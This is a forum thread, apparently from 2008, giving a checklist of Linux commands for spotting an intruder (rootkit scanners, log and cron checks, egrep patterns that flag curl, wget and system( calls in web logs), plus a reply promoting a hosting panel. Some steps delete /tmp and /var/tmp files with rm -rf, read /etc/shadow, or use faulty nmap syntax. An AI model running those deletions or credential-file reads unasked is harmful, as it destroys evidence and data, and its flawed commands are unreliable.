How-to detect a possible intruder ¿? (Linux Server)

Collapse
This is a sticky topic.
X
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • siosios
    g0d!
    Kung Fu Master
    • Oct 2006
    • 13626
    #1

    How-to detect a possible intruder ¿? (Linux Server)

    Advise: this are steps recompiled from the network and a from some books, these were not done by me.

    Hello..

    I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.

    1.- Download and run Rkhunter & Chkrootkit
    2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
    3.- Search for ssh and ftp accepted logins.

    Code:
    Code:
    last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
    4.- Watch current connections and scan your ports.

    Code:
    Code:
    netstat -nalp
nmap 1-65535 localhost
    5.- Search for suspicious content on common explotable dirs.

    Code:
    Code:
    rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
    6.- Checking for anomalies on this files.

    Code:
    Code:
    less /etc/passwd 
less /etc/shadow
less /etc/groups
    7.- Search for new users at sudoers, check wtmp and telnet is not running.

    Code:
    Code:
    cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
    8.- Find bash history files

    Code:
    Code:
    find '/' -iname .bash_history
    9 .- Verify the Crontab table

    Code:
    Code:
    crontab -l
    10 .- Update the slocate database and search for exploits.

    Code:
    Code:
    updatedb &
    For cPanel servers:

    Code:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
    For Ensim servers:

    Code:
    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
    Search for shell code:

    Code:
    Code:
    cat /path/of/your/web/logs/* |grep "/x90/"
    11.- Search for hidden dirs

    Code:
    Code:
    locate "..."
locate ".. "
rlocate " .."
locate ". "
locate " ."
    12.- Search for perl-scripts running

    Code:
    Code:
    ps -aux | grep perl
    13 .- Checking nobody user and open files.

    Code:
    Code:
    service httpd stop
lsof -u nobody
    Please, add your tips and tricks about this
    Last edited by siosios; 12-08-2008, 06:00 PM.
    ------------------------------------------------

    |W0rd|SexualTurtletara420ת/ύ: Hey there daddy..

    ------------------------------------------------
    \\\ ///
    ( @ @ )
    .....o00o.(_).o00o.....


    ------------------------------------------
    Tags: None
    • Stuck
    • w4d
      Inactive
      • Sep 2007
      • 27
      #2
      Very nice, Sios. Linux ftw.

      Oh by the way, if you plan on making a hosting company or know a hosting company, give them this: http://www.corecp.com

      We just opened our BETA friday and we're all excited about it. It's gonna be ownage. ^_^
      AKA suttoN on the n/u servers

        Comment

        Previous template Next
        Working...